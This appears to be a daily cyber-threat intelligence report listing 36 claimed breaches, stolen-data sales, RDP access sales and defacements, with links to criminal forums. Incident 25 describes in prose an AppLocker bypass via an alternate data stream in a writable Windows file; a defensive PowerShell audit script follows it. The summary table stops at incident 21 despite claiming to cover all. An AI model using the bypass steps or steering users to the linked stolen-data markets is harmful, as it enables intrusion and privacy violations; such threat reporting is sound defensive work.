1. Executive Summary
This report provides a comprehensive overview of critical cybersecurity incidents observed in the last 24 hours, alongside in-depth analysis of prominent threat actors and evolving attack methodologies. The current threat landscape is characterized by a notable convergence of tactics between financially motivated cybercriminals and nation-state actors, an increasing focus on critical infrastructure, and the rapid exploitation of newly disclosed vulnerabilities. While law enforcement efforts continue to disrupt key cybercrime forums, these disruptions often lead to adaptive shifts in adversary operations. Key actors under scrutiny include state-sponsored entities such as LIUSHEN and the Handala Hack group, financially driven operations like REvil (KrimCo), Pryx (Hellcat), Storm-0539, and the Ghost ransomware group, as well as hacktivist collectives such as TH3 EL1T3 GHOST and Z-PENTEST ALLIANCE.
2. Daily Incident Overview
This section details each cybersecurity breach reported, offering essential context and direct links to supporting evidence.
- Incident 1: Alleged database sale of AKB48
- Affected Entity/Sector: AKB48 (Music Industry), Japan
- Attack Type: Data Breach
- Primary Threat Actor(s): LIUSHEN
- Initial Impact: A threat actor claims to be selling a database from AKB48. The compromised data reportedly includes 2.9 GB of membership and user-related records, provided in XLSX, PDF, and DOC formats.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-AKB48-DATABASE-HQ-MEMBERSHIP-AND-USER 48
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/4b62a429-b756-4f99-b8fd-37d97fd7f630.png
- Incident 2: Alleged Leak of Crypto Users Data
- Affected Entity/Sector: Crypto Users (Various Platforms)
- Attack Type: Data Leak
- Primary Threat Actor(s): KrimCo
- Initial Impact: The threat actor claims to have leaked a dataset named “Have I Been Drained Crypto (HIBD)”, which allegedly merges multiple previously exposed public crypto-related databases into one. The compilation reportedly includes data from prominent platforms such as Cointracker, Chainlink, Binance (US), Gemini, and more. The post includes email addresses, full names, phone numbers, wallet addresses, physical addresses, and partial identification information. The files are distributed through third-party hosting services.
- Supporting Links:
- Published URL: https://forum.exploit.in/topic/261901/?do=findComment&comment=1579277 45
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/8646b678-4659-43be-b342-f592adf4d6a2.PNG, https://d34iuop8pidsy8.cloudfront.net/762f49b3-cc3c-4fb8-a755-b0e17d4b137a.PNG
- Incident 3: Alleged database sale of Subway
- Affected Entity/Sector: Subway (Restaurants), Guatemala
- Attack Type: Data Breach
- Primary Threat Actor(s): CrakX_Combo
- Initial Impact: A threat actor claims to be selling a database allegedly belonging to Subway. The compromised data reportedly includes 3,786,863 records containing information such as first and last names, transaction IDs, restaurant names, unhashed employee usernames and passwords, roles, email addresses, codes, quantities, document and transaction numbers, user details, and timestamps. The total uncompressed data size is approximately 360MB. Note: Subway had previously fallen victim to a LockBit ransomware attack on January 21, 2024.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Selling-Subway-Guatemala-Database-52904-Email-Full-name-Txn-Employe-pswds-Gift-Codes 2
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/23b62fee-b80b-447e-a3e1-1d95b4f28de6.png, https://d34iuop8pidsy8.cloudfront.net/efd3cc60-7f6b-496c-993f-ae3411527413.png
- Incident 4: TH3 EL1T3 GHOST targets the website of Rod Gill Photography
- Affected Entity/Sector: Rod Gill Photography (Photography), Australia
- Attack Type: Defacement
- Primary Threat Actor(s): TH3 EL1T3 GHOST
- Initial Impact: The group claims to have defaced the website of Rod Gill Photography.
- Supporting Links:
- Published URL: https://t.me/c/2656447819/67 49
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d8f81098-f99a-4956-8af6-c1d61a5b79de.png, https://d34iuop8pidsy8.cloudfront.net/d1dac6d3-423e-44d8-8109-014617a907e8.png
- Incident 5: TH3 EL1T3 GHOST targets the website of Blanceran Village Government
- Affected Entity/Sector: Blanceran Village Government (Government Administration), Indonesia
- Attack Type: Defacement
- Primary Threat Actor(s): TH3 EL1T3 GHOST
- Initial Impact: The group claims to have defaced the website of Blanceran Village Government.
- Supporting Links:
- Published URL: https://t.me/c/2656447819/67 49
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/48fceae5-4ab9-4503-ac3d-b8953210a0e4.png, https://d34iuop8pidsy8.cloudfront.net/c585ddc1-a112-4a54-850a-67323ee67ecd.png
- Incident 6: TH3 EL1T3 GHOST targets the website of Eden Farm Wellness
- Affected Entity/Sector: Eden Farm Wellness (Agriculture & Farming), Australia
- Attack Type: Defacement
- Primary Threat Actor(s): TH3 EL1T3 GHOST
- Initial Impact: The group claims to have defaced the website of Eden Farm Wellness.
- Supporting Links:
- Published URL: https://t.me/c/2656447819/67 49
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/49b54bb2-9b8b-4533-9843-d7713e158cc2.png, https://d34iuop8pidsy8.cloudfront.net/c4cd9e23-083c-4c81-bf38-0031c6b9de98.png
- Incident 7: TH3 EL1T3 GHOST targets the website of Samudera Digital
- Affected Entity/Sector: Samudera Digital (Software Development), Indonesia
- Attack Type: Defacement
- Primary Threat Actor(s): TH3 EL1T3 GHOST
- Initial Impact: The group claims to have defaced the website of Samudera Digital.
- Supporting Links:
- Published URL: https://t.me/c/2656447819/67 49
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/ed4bd8e8-afa5-4afa-b4c1-8d41520f5aa1.png, https://d34iuop8pidsy8.cloudfront.net/c1f64128-1104-4d1c-94d9-600135ee2ff9.png
- Incident 8: Alleged database sale of South Breeze School Bangladesh
- Affected Entity/Sector: South Breeze School BD (Education), Bangladesh
- Attack Type: Data Breach
- Primary Threat Actor(s): RXY
- Initial Impact: A threat actor claims to be selling the database from South Breeze School Bangladesh. The compromised data reportedly includes student records containing passport numbers, names, dates of birth, addresses, parent contact details, email addresses, academic qualifications, and payment status.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Source-Code-SOUTH-BREEZE-SCHOOL-BANGLADESH-DATA-BASE 39
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/6ff77567-407f-4fc2-8818-b0f869631b2.png
- Incident 9: Alleged data breach of Vodafone
- Affected Entity/Sector: Vodafone (Network & Telecommunications), India
- Attack Type: Data Breach
- Primary Threat Actor(s): Team_CRO
- Initial Impact: A threat actor claims to be selling data from Vodafone in India. The compromised data reportedly includes 99,936 user records, such as names, phone numbers, email addresses, company names, and more.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Selling-INDIAN-VODAPHONE-DATA-IS-FOR-SELL 5
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/19e9d410-75d1-4fd2-b90c-1301254b7248.png
- Incident 10: Alleged sale of RDP access to an unidentified Brazilian company
- Affected Entity/Sector: Unidentified Brazilian Company (Unspecified Industry), Brazil
- Attack Type: Initial Access
- Primary Threat Actor(s): Dimitry_S
- Initial Impact: A threat actor claims to be selling RDP access to an unidentified Brazilian company, protected by Bitdefender antivirus. The access reportedly includes domain management capabilities, over 150 public records, and indicates a revenue of 70 million BRL.
- Supporting Links:
- Published URL: https://forum.exploit.in/topic/261896/?tab=comments#comment-1579251 50
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/4d492c10-3121-4a0a-83fe-5c98830d6bc9.png
- Incident 11: Alleged access to the Trassir surveillance cameras at Xella Romania’s warehouse
- Affected Entity/Sector: Xella Romania (Building and Construction), Romania
- Attack Type: Initial Access
- Primary Threat Actor(s): Z-ALLIANCE
- Initial Impact: A group claims to have gained full access to Trassir surveillance systems at Xella Romania’s warehouse in Bucharest. The breach reportedly includes control over live camera feeds, archived footage, site-related reports, and equipment configurations. Xella Romania is a local branch of the major construction materials group, Xella.
- Supporting Links:
- Published URL: https://t.me/Z_alliance_ru/325 51
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/6788316a-fa4b-4857-9247-aaaf2bb939b2.png, https://d34iuop8pidsy8.cloudfront.net/5b2f4cae-7086-4c92-b175-37112fc657f8.png
- Incident 12: Alleged Data Leak of Splento Ltd
- Affected Entity/Sector: Splento Ltd (Photography), UK
- Attack Type: Data Breach
- Primary Threat Actor(s): gravity
- Initial Impact: The threat actor claims to have leaked a 2.2 GB database allegedly from Splento Ltd, a platform that provides professional photography and videography services.
- Supporting Links:
- Published URL: https://leakbase.la/threads/splento-com-2-2gb-database.40019/ 46
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/8178cc60-60cf-47b5-a50a-8eec060729c2.PNG
- Incident 13: Alleged database sale of Morocco’s Social Insurance
- Affected Entity/Sector: Morocco’s Social Insurance (Insurance), Morocco
- Attack Type: Data Breach
- Primary Threat Actor(s): Leonsky
- Initial Impact: A threat actor claims to be selling a database allegedly extracted from Morocco’s social insurance system, containing records from April. The compromised data reportedly includes personal and sensitive details of 2 million users, such as full names, ID numbers, dates of birth, gender, national IDs, phone numbers, email addresses, employer information, insurance status, and contribution history.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Selling-Morocco-social-insurance-April-DB 52
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/56e6e9dc-b95e-49ea-ac6c-928a34751430.png
- Incident 14: Alleged data leak of Niflaot Hatzuna Ltd
- Affected Entity/Sector: Niflaot Hatzuna Ltd (Food & Beverages), Israel
- Attack Type: Data Breach
- Primary Threat Actor(s): Handala Hack
- Initial Impact: The group claims to have leaked 220GB of data from Niflaot Hatzuna Ltd, which includes procurement orders, delivery logs, staff lists, invoices, and kitchen schedules.
- Supporting Links:
- Published URL: https://t.me/handala_hack27/72 41
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/f3ec4e94-699e-4c72-bcf4-d891b9095f92.png, https://d34iuop8pidsy8.cloudfront.net/00160cdb-89d8-43a4-a62e-105316b8b3c2.png
- Incident 15: Alleged data breach of Tlalnepantla
- Affected Entity/Sector: Tlalnepantla (Government Administration), Mexico
- Attack Type: Data Breach
- Primary Threat Actor(s): M3xTr1x02
- Initial Impact: The threat actor claims to have leaked data related to TLALNEPANTLA, including limited extracted information.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-TLALNEPANTLA-EDOMEX 11
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/256d90b9-517a-4e55-9319-23563e411662.png
- Incident 16: Alleged data breach of Raqamli hukumat
- Affected Entity/Sector: Raqamli hukumat (Government Administration), Uzbekistan
- Attack Type: Data Breach
- Primary Threat Actor(s): Darkfirefox
- Initial Impact: The threat actor claims to have breached the data of Raqamli hukumat. The compromised data reportedly consists of names, email addresses, passwords, phone numbers, and other fields.
- Supporting Links:
- Published URL: https://xss.is/threads/141217/ 10
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/45750de2-69e5-4cbb-9e54-f6b4b33fc9ed.png
- Incident 17: Alleged data leak of events and major web3 conferences
- Affected Entity/Sector: Web3 Conferences (Unspecified Industry)
- Attack Type: Data Leak
- Primary Threat Actor(s): MartinL
- Initial Impact: The threat actor claims to have leaked data from events and major Web3 conferences, including valuable contact information.
- Supporting Links:
- Published URL: https://xss.is/threads/141215/ 53
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/031a10bc-8178-4576-863e-9b11fb0f55c9.jpg
- Incident 18: Alleged data breach of Schrödinger
- Affected Entity/Sector: Schrödinger (Software Development), USA
- Attack Type: Data Breach
- Primary Threat Actor(s): _Sentap
- Initial Impact: The threat actor claims to be selling a 9GB internal dataset allegedly stolen from Schrödinger GmbH, the German branch of the global computational chemistry firm Schrödinger, Inc. The dataset spans from 2018 to 2025 and includes sensitive financial invoices, employee expense reports, SEPA payment records, legal contracts, scientific collaborations (notably with Merck KGaA), and operational documents across Germany, France, and Switzerland. It also contains personal identifiers, banking details, and strategic insights relevant to marketing, logistics, IT, and telecom operations.
- Supporting Links:
- Published URL: https://xss.is/threads/141216/ 44
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/960eb6d3-b4ce-4ddd-8018-8b3dce660cb0.png, https://d34iuop8pidsy8.cloudfront.net/5e80075e-d811-43bb-b0be-79769c905357.png, https://d34iuop8pidsy8.cloudfront.net/1ab4e6a2-4e09-42b5-b2d9-80bc53fb2cb5.png
- Incident 19: Alleged sale of Unauthorized RDP access to an unidentified consumer services firm in UK
- Affected Entity/Sector: Unidentified Consumer Services Firm (Consumer Services), UK
- Attack Type: Initial Access
- Primary Threat Actor(s): C3FaRiR
- Initial Impact: The threat actor claims to be selling RDP access with admin-level privileges to a UK-based organization operating in the consumer services sector. The access includes over 90 systems, one domain controller, and one domain trust. The compromised systems allegedly contain numerous scanned documents.
- Supporting Links:
- Published URL: https://xss.is/threads/141214/ 54
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/4f945737-d1b4-4f6d-b0b6-7328ea4d5348.png
- Incident 20: Alleged sale of unauthorized RDP access to unidentified accounting firm in UK
- Affected Entity/Sector: Unidentified Accounting Firm (Accounting), UK
- Attack Type: Initial Access
- Primary Threat Actor(s): C3FaRiR
- Initial Impact: The threat actor claims to be selling RDP access with domain user rights of an unidentified UK-based certified accounting firm. The access includes over 55 systems, one domain controller, and one domain trust. The actor states the network holds 2TB of sensitive data, including bank statements, payroll records, and tax documents.
- Supporting Links:
- Published URL: https://xss.is/threads/141214/ 54
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/a40b46ab-bf16-4b76-bb2f-80f2732bca44.png
- Incident 21: Alleged sale of sensitive data from Russian Military Unit 11387
- Affected Entity/Sector: Russian Military Unit 11387 (Military Industry), Russia
- Attack Type: Data Leak
- Primary Threat Actor(s): whiterose
- Initial Impact: The threat actor claims to be selling a leaked database from Russian Military Unit 11387, which allegedly contains 7,947 records of highly sensitive internal personnel data. The database is said to be in .dt format, sized at 250MB compressed (7GB uncompressed), and includes detailed information such as full names, dates of birth, personal numbers, SNILS (Russian Social Security Numbers), military ranks, positions, unit assignments, service status, subdivisions, biometric data (including fingerprints), and clear face photos of individuals.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Russian-Military-Unit-11387-Database-Sensitive-Internal-Data 21
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/9912b50d-208a-41c8-a92d-2ba4e7fe2ff9.png, https://d34iuop8pidsy8.cloudfront.net/f366cbb0-c093-4c9b-9add-4498a1dff97d.png, https://d34iuop8pidsy8.cloudfront.net/6f771adc-41a8-49b0-b5a9-dbf9a032ce33.png, https://d34iuop8pidsy8.cloudfront.net/fae5c514-9c41-4ab5-bc04-62082053a074.png
- Incident 22: Alleged data breach of Telefónica Argentina
- Affected Entity/Sector: Telefónica Argentina (Network & Telecommunications), Argentina
- Attack Type: Data Breach
- Primary Threat Actor(s): injectioninferno
- Initial Impact: The threat actor claims to have leaked a database from telefonica.com.ar containing 1,200,025 records.
- Supporting Links:
- Published URL: https://xss.is/threads/141212/ 17
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/4b657a98-8e85-47ca-be4a-a47e8bccb516.png
- Incident 23: Alleged data breach of FGTS
- Affected Entity/Sector: FGTS (Government & Public Sector), Brazil
- Attack Type: Data Breach
- Primary Threat Actor(s): injectioninferno
- Initial Impact: The threat actor claims to have breached the FGTS website in Brazil. The compromised data reportedly consists of 1.5 million lines of data.
- Supporting Links:
- Published URL: https://xss.is/threads/141213/ 18
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/5ff145c2-5b05-4528-8dec-80f625934af9.png
- Incident 24: Alleged leak of 0day buffer overflow vulnerability
- Affected Entity/Sector: OpenSSH (Unspecified Industry)
- Attack Type: Vulnerability
- Primary Threat Actor(s): l33tfg
- Initial Impact: The threat actor claims to have discovered and exploited a zero-day buffer overflow vulnerability in the portable version of OpenSSH_10.0p2. They assert that the flaw resides in the packet.c file of the OpenSSH source code and have shared technical details.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-OpenSSH-10-0p2-portable-verion-Buffer-overflow-0day-vulnerability 22
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/ca8624b8-8e2a-43e1-9aac-e27f878b599a.png
- Incident 25: Alleged Exploit of AppLocker on Lenovo Machines
- Affected Entity/Sector: Lenovo (Information Technology (IT) Services)
- Attack Type: Vulnerability
- Primary Threat Actor(s): xrahitel
- Initial Impact: The threat actor claims to have exploited a vulnerability involving a writable file located in the Windows directory on Lenovo machines. The file, C:\Windows\MFGSTAT.zip, was found to have improper permissions, allowing any authenticated user to write to it. This misconfiguration can be abused to bypass AppLocker, as default rules typically allow execution from within the Windows directory. By adding a binary such as autoruns.exe as an alternate data stream to the ZIP file and executing it using a trusted Microsoft-signed binary (appvlp.exe), an attacker can evade application whitelisting without requiring administrative privileges. Originally discovered in 2019 and re-verified on newer Lenovo devices in 2025, the issue appears to affect multiple models running Lenovo’s default Windows image. Lenovo has acknowledged the issue and issued guidance recommending removal of the MFGSTAT.zip file rather than releasing a patch. This case underscores the importance of reviewing filesystem permissions in trusted directories when deploying or managing AppLocker in enterprise environments.
- Supporting Links:
- Published URL: https://ramp4u.io/threads/applocker-bypass-on-lenovo-machines-%E2%80%93-the-curious-case-of-mfgstat-zip.3249/ 6
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/ea1d0cf8-3e36-43ca-b1ad-a6f2d310ad89.png, https://d34iuop8pidsy8.cloudfront.net/f9b80aa7-29b1-4212-b647-344562b3afba.png, https://d34iuop8pidsy8.cloudfront.net/16591b8b-12f6-4ea2-8f93-eeb96b2d4e89.png, https://d34iuop8pidsy8.cloudfront.net/c8eb1199-f336-4441-8139-9c583d490377.png
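The closing point of Incident 25 is that AppLocker's default path rules trust everything under the Windows directory, so a single low-privilege-writable file there undermines the policy. The script below is an added defensive example written for this report, not code from the forum post or from Lenovo: it walks a trusted directory, inspects each file's ACL, and reports files that broad principals ("BUILTIN\Users", "NT AUTHORITY\Authenticated Users", "Everyone", "NT AUTHORITY\INTERACTIVE") are allowed to write to, and it separately flags the MFGSTAT.zip file the report names. The identity list, the depth limit and the parameter names are assumptions chosen for illustration.

```powershell
# Added example (not from the original report): audit a trusted AppLocker
# directory for files that low-privilege principals can write to.
# Assumes Windows PowerShell 5.1 or later (Get-ChildItem -Depth). Run as an
# administrator so every ACL can be read.
param(
    [string]$Root  = 'C:\Windows',   # trusted directory to audit
    [int]   $Depth = 1               # constructed default: top level plus one
)

# Principals whose write access inside a trusted directory is suspicious.
# Constructed starting list; extend it for your environment.
$LowPrivIdentities = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets a principal change or replace file content.
$R = [System.Security.AccessControl.FileSystemRights]
$WriteRights = $R::Write -bor $R::Modify -bor $R::FullControl -bor
               $R::WriteData -bor $R::AppendData

function Test-LowPrivWritable {
    # Returns a finding object when a low-privilege ACE grants write access,
    # otherwise $null.
    param([System.IO.FileInfo]$File)
    $acl = Get-Acl -LiteralPath $File.FullName -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) {
            return [pscustomobject]@{
                Path     = $File.FullName
                Identity = $ace.IdentityReference.Value
                Rights   = $ace.FileSystemRights
            }
        }
    }
    return $null
}

# Files whose ACL cannot be read are skipped rather than aborting the sweep.
$findings = Get-ChildItem -LiteralPath $Root -File -Depth $Depth -Force -ErrorAction SilentlyContinue |
    ForEach-Object { try { Test-LowPrivWritable -File $_ } catch { $null } } |
    Where-Object { $_ -ne $null }

# The specific artifact from the report; Lenovo's guidance is to remove it.
$mfgstat = Join-Path $Root 'MFGSTAT.zip'
if (Test-Path -LiteralPath $mfgstat) {
    Write-Warning "Found $mfgstat; review its ACL and remove it per vendor guidance."
}

if ($findings) {
    $findings | Sort-Object Path | Format-Table -AutoSize
} else {
    Write-Output "No low-privilege-writable files found under $Root (depth $Depth)."
}
```

A finding is not by itself proof of an AppLocker bypass (the rule set may not trust that path), but every file listed should either have its ACL tightened to administrators only or be covered by an explicit AppLocker deny rule; the AppLocker audit-mode event log will then show any execution attempts from the flagged paths.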
- Incident 26: Alleged leaked database of UK car insurance members
- Affected Entity/Sector: UK Car Insurance Members (Insurance), UK
- Attack Type: Data Leak
- Primary Threat Actor(s): DigitalGhost
- Initial Impact: A threat actor claims to have leaked data of 150K UK car insurance members. The exposed records include names, email addresses, phone numbers, postcodes, and loan application statuses.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-150K-UK-CAR-INSURANCE-MEMBERS 55
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/91fcafff-d9de-4bda-a26e-1359a4f0e1fc.png
- Incident 27: Alleged Data breach of BPJS Health Database – Indonesia
- Affected Entity/Sector: BPJS Kesehatan (Government & Public Sector), Indonesia
- Attack Type: Data Breach
- Primary Threat Actor(s): MR4cX
- Initial Impact: The threat actor claims to be selling a BPJS Health (Indonesia) database; the compromised data reportedly includes full names, addresses, and BPJS identification numbers.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Document-DATABASE-BPJS-FORM-INDONESIA–15996 56
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/2716ef83-355a-44d8-af20-359806ca3a9f.jpg
- Incident 28: Alleged data breach of Claro Argentina
- Affected Entity/Sector: Claro (Network & Telecommunications), Argentina
- Attack Type: Data Breach
- Primary Threat Actor(s): injectioninferno
- Initial Impact: The threat actor claims to have leaked a database allegedly belonging to Claro Argentina, a major telecommunications provider. The dump reportedly contains over 1.1 million lines of data, though specific fields are not detailed.
- Supporting Links:
- Published URL: https://xss.is/threads/141210/ 57
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/fc11ef96-0fd4-4bbe-a60d-36e198c95a2b.png
- Incident 29: Alleged data breach of Official website of the Russian Federation on the sale of state and municipal property
- Affected Entity/Sector: Russian Federation on the Sale of State and Municipal Property (Government Administration), Russia
- Attack Type: Data Breach
- Primary Threat Actor(s): DigitalGhost
- Initial Impact: The threat actor claims to have leaked 500K records from the official website of the Russian Federation for the sale of state and municipal property.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-500K-TORGI-GOV-RU 43
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/37dfb42a-65e9-452b-829b-79148ed22af5.JPG
- Incident 30: Alleged Data Breach of French CPAM (Caisse Primaire d’Assurance Maladie)
- Affected Entity/Sector: Caisse Primaire d’Assurance Maladie (Government Administration), France
- Attack Type: Data Breach
- Primary Threat Actor(s): zdclub
- Initial Impact: A threat actor claims to be selling data from the French CPAM (Caisse Primaire d’Assurance Maladie), alleging the current lot contains over 300,000 unique and unused records. The actor also claims the dataset is scalable to up to 5 million entries on demand. The data reportedly includes full names, dates of birth, street-level addresses, zip codes, cities, phone numbers (mobile and landline), national ID (INSEE) numbers, and other personal information.
- Supporting Links:
- Published URL: https://forum.exploit.in/topic/261887/ 58
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/cc606dfe-9765-4181-9b3d-ef8e9759e04d.png, https://d34iuop8pidsy8.cloudfront.net/c90c440a-a5b7-45f5-a559-8455faa92dca.png
- Incident 31: Liwaa Muhammad targets the website of amextransport.in
- Affected Entity/Sector: Amextransport (Unspecified Industry), India
- Attack Type: Defacement
- Primary Threat Actor(s): Liwaa Muhammad
- Initial Impact: The group claims to have defaced the website of amextransport.in.
- Supporting Links:
- Published URL: https://t.me/liwaamohammad/454 59
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/17e3dcab-549d-4d89-8be1-6ac190f0a252.png
- Incident 32: Alleged sale of sensitive data from UAE
- Affected Entity/Sector: UAE (Unspecified Industry), UAE
- Attack Type: Data Leak
- Primary Threat Actor(s): CKD69
- Initial Impact: The threat actor claims to be selling sensitive Emirati data, which allegedly includes passports, ID cards, phone numbers, and information related to UAE government websites and major companies in the country.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Document-Emirate-secret-data 60
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/ab0b0f45-0753-4fe3-a2ce-d7db522a2471.png
- Incident 33: Alleged Sale of Credit Card Data from USA
- Affected Entity/Sector: Unspecified (Unspecified Industry), USA
- Attack Type: Data Leak
- Primary Threat Actor(s): esgod
- Initial Impact: The threat actor claims to be selling 3,500 U.S. credit cards, with compromised data including the card’s expiry date (exp), CVV, cardholder name, address, phone number, email, and other personally identifiable information.
- Supporting Links:
- Published URL: https://forum.exploit.in/topic/261885/ 20
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/44a4d29b-db78-4240-ac4c-4d2611dd35de.png
- Incident 34: Alleged Data Leak of STAR Insurance
- Affected Entity/Sector: STAR Insurance (Insurance), Tunisia
- Attack Type: Data Leak
- Primary Threat Actor(s): mecrobyte
- Initial Impact: The threat actor claims to have leaked internal documents from STAR (Société Tunisienne d’Assurances et de Réassurances), a Tunisian insurance and reinsurance provider.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Leak-Docs-From-Star-Assurance-Tunisie-Agence 26
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/db22deee-f45a-4af6-b6e7-a9086ac53305.jpg
- Incident 35: Alleged leak of Business & Investor Database from USA
- Affected Entity/Sector: Unspecified (Unspecified Industry), USA
- Attack Type: Data Leak
- Primary Threat Actor(s): USDeez
- Initial Impact: A threat actor claims to have leaked an 8M-record USA Business & Investor Database (263 GB). The data includes company names, contact info, addresses, employee sizes, sales volumes, SIC codes, and business descriptions.
- Supporting Links:
- Published URL: https://xss.is/threads/141206/ 61
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/5a2ced22-a1b0-4ba7-955c-9385126b572f.png
- Incident 36: Alleged data leak of Indian Journal Of Practical Pediatrics
- Affected Entity/Sector: Indian Journal of Practical Pediatrics (Healthcare & Pharmaceuticals), India
- Attack Type: Data Breach
- Primary Threat Actor(s): RXY
- Initial Impact: The threat actor claims to be selling the database of the Indian Journal of Practical Pediatrics. The exposed data includes personally identifiable information (PII) of numerous medical professionals such as names, designations, registration numbers, addresses, mobile numbers, and email IDs.
- Supporting Links:
- Published URL: https://darkforums.st/Thread-Source-Code-INDIAN-JOURNAL-OF-PRACTICAL-PEDIATRICS-DATA-BASE 13
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7f93d190-d19d-426a-99ec-17aa3e032679.png
Table 1: Daily Incident Summary
This table provides a quick, at-a-glance overview of all reported incidents for rapid assessment by security leaders and operational teams. It allows for immediate identification of the most critical or relevant events.
Incident ID | Date Reported | Target Sector/Entity | Attack Type | Primary Threat Actor | Key Impact |
--- | --- | --- | --- | --- | --- |
1 | 2025-07-04T12:01:07Z | AKB48 (Music), Japan | Data Breach | LIUSHEN | 2.9 GB of membership and user-related records for sale. |
2 | 2025-07-04T11:55:20Z | Crypto Users (Various Platforms) | Data Leak | KrimCo | Merged crypto-related databases (emails, names, phones, wallets, addresses, partial IDs). |
3 | 2025-07-04T11:24:37Z | Subway (Restaurants), Guatemala | Data Breach | CrakX_Combo | 3.7M records including names, transaction IDs, unhashed employee credentials, emails, etc. |
4 | 2025-07-04T11:07:05Z | Rod Gill Photography (Photography), Australia | Defacement | TH3 EL1T3 GHOST | Website defacement. |
5 | 2025-07-04T11:06:45Z | Blanceran Village Government (Government Administration), Indonesia | Defacement | TH3 EL1T3 GHOST | Website defacement. |
6 | 2025-07-04T11:06:24Z | Eden Farm Wellness (Agriculture & Farming), Australia | Defacement | TH3 EL1T3 GHOST | Website defacement. |
7 | 2025-07-04T11:05:59Z | Samudera Digital (Software Development), Indonesia | Defacement | TH3 EL1T3 GHOST | Website defacement. |
8 | 2025-07-04T11:03:02Z | South Breeze School BD (Education), Bangladesh | Data Breach | RXY | Student records including passport numbers, names, DOB, addresses, parent contacts, emails, academic info, payment status. |
9 | 2025-07-04T09:57:02Z | Vodafone (Network & Telecommunications), India | Data Breach | Team_CRO | 99,936 user records (names, phone numbers, emails, company names). |
10 | 2025-07-04T08:34:58Z | Unidentified Brazilian Company (Unspecified Industry), Brazil | Initial Access | Dimitry_S | RDP access with domain management capabilities, 150+ public records, 70M BRL revenue. |
11 | 2025-07-04T08:23:43Z | Xella Romania (Building and Construction), Romania | Initial Access | Z-ALLIANCE | Full access to Trassir surveillance systems (live feeds, archived footage, reports, configs). |
12 | 2025-07-04T08:04:27Z | Splento Ltd (Photography), UK | Data Breach | gravity | 2.2 GB database leak. |
13 | 2025-07-04T08:02:41Z | Morocco’s Social Insurance (Insurance), Morocco | Data Breach | Leonsky | 2 million user records (names, IDs, DOB, gender, national IDs, phones, emails, employer info, insurance status, contribution history). |
14 | 2025-07-04T07:34:31Z | Niflaot Hatzuna Ltd (Food & Beverages), Israel | Data Breach | Handala Hack | 220GB of procurement orders, delivery logs, staff lists, invoices, kitchen schedules. |
15 | 2025-07-04T06:23:19Z | Tlalnepantla (Government Administration), Mexico | Data Breach | M3xTr1x02 | Limited extracted data. |
16 | 2025-07-04T06:12:39Z | Raqamli hukumat (Government Administration), Uzbekistan | Data Breach | Darkfirefox | Names, emails, passwords, phone numbers. |
17 | 2025-07-04T06:08:28Z | Web3 Conferences (Unspecified Industry) | Data Leak | MartinL | Valuable contact information from events and major Web3 conferences. |
18 | 2025-07-04T05:59:33Z | Schrödinger (Software Development), USA | Data Breach | _Sentap | 9GB internal dataset (financial invoices, expense reports, SEPA payments, contracts, collaborations, PII, banking details, strategic insights). |
19 | 2025-07-04T05:41:21Z | Unidentified Consumer Services Firm (Consumer Services), UK | Initial Access | C3FaRiR | RDP access with admin privileges to 90+ systems, domain controller, domain trust, scanned documents. |
20 | 2025-07-04T05:36:27Z | Unidentified Accounting Firm (Accounting), UK | Initial Access | C3FaRiR | RDP access with domain user rights to 55+ systems, domain controller, domain trust, 2TB sensitive data (bank statements, payroll, tax docs). |
21 | 2025-07-04T04:53:10Z | Russian Military Unit 11387 (Military Industry), Russia | Data Leak | whiterose | 7,947 records of sensitive internal personnel data (names, DOB, personal numbers, SNILS, ranks, positions, unit assignments, service status, biometrics, face photos). |
